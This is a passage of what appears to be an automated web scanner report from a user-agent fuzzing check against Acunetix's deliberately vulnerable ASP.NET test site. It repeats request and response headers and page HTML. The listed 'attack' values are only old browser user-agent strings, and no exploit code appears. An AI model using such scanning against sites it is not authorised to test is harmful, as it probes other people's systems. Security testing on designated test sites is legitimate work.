name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Show / hide Request and Response
Request Header - size: 428 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:24 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Show / hide Request and Response
Request Header - size: 428 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:24 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" 